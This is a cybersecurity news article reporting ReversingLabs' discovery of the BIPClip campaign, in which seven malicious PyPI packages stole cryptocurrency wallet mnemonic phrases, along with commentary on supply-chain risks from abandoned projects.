Threat hunters have uncovered a collection of seven packages on the Python Package Index (PyPI) repository designed to steal BIP39 mnemonic phrases used to recover private keys of cryptocurrency wallets.
This software supply chain attack campaign, named BIPClip by ReversingLabs, had a combined download count of 7,451 before removal from PyPI. The list of packages includes –
BIPClip, targeting developers of cryptocurrency wallet projects, has been active since at least December 4, 2022, with the first appearance of hashdecrypt on the registry.
“This is the latest instance of a software supply chain campaign targeting crypto assets,” said security researcher Karlo Zanki in a report to The Hacker News. “It underscores the ongoing trend of cryptocurrency being a prime target for supply chain threat actors.”
One of the packages, mnemonic_to_address, was designed to evade detection by appearing harmless, with the malicious code hidden in a dependency named bip39-mnemonic-decrypt.
The primary goal of the package is to steal mnemonic phrases and send the data to a server controlled by the threat actor.
Another two packages, public-address-generator and erc20-scanner, operate similarly, sending the stolen phrases to a central server for control.
hashdecrypts, functioning independently, also steals data by executing similar code present in the package itself.
ReversingLabs also found references to a GitHub profile named “HashSnake,” promoting a repository called hCrypto as a tool to extract mnemonic phrases from crypto wallets using hashdecrypts.
A deeper look into the repository’s commit history reveals a year-long campaign that evolved from importing the hashdecrypt package to hashdecrypts, the version uploaded on PyPI on March 1, 2024.
The campaign operators also maintain a presence on Telegram and YouTube, showcasing tools like xMultiChecker 2.0 targeting crypto assets.
“The packaging of these discovered packages was intentionally made less suspicious, focusing solely on compromising crypto wallets for theft,” Zanki mentioned.
“With no broader agenda, this campaign evaded security measures within impacted organizations.”
This incident highlights the security risks present in open-source package repositories, compounded by legitimate platforms like GitHub being exploited as a distribution channel for malware.
Abandoned projects serve as attractive targets for threat actors to hijack developer accounts and publish trojanized versions, leading to major supply chain threats.
“Abandoned digital assets remain a potent threat, as attackers leverage them to infiltrate open-source ecosystems,” noted Checkmarx recently.
Case studies like MavenGate and CocoaPods showcase the risks of abandoned domains being used for malicious intent.